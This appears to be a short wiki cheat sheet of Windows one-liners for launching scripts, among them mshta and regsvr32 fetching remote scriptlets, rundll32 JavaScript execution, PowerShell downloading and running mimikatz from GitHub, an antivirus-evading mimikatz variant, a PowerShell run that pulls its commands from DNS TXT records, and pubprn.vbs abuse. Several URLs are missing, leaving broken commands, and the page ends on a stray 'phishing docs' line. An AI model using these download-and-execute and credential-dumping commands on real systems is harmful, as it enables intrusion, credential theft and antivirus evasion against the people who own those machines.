From WikiWiki
Jump to navigation Jump to search

Some fun oneliners to start a script

mshta.exe vbscript:GetObject("script:https://server/sct")(window.close)
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject('WScript.Shell');w.Exec('calc')");

#runs mimikatz straight from github
invoke-expression (Invoke-WebRequest -Uri;invoke-mimikatz

#runs mimikatz with split-up custom version to evade antivirus
invoke-expression (Invoke-WebRequest -Uri;invoke-bananas

#starts calc
regsvr32 /u /n /s /i: scrobj.dll

#starts powershell that runs mimikatz
regsvr32 /u /n /s /i: scrobj.dll

#start calc -
powershell -ep bypass -nop -c "powershell . ((nslookup.exe -q=txt ))[5]"

#run calc via vbs
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs blah "script:

phishing docs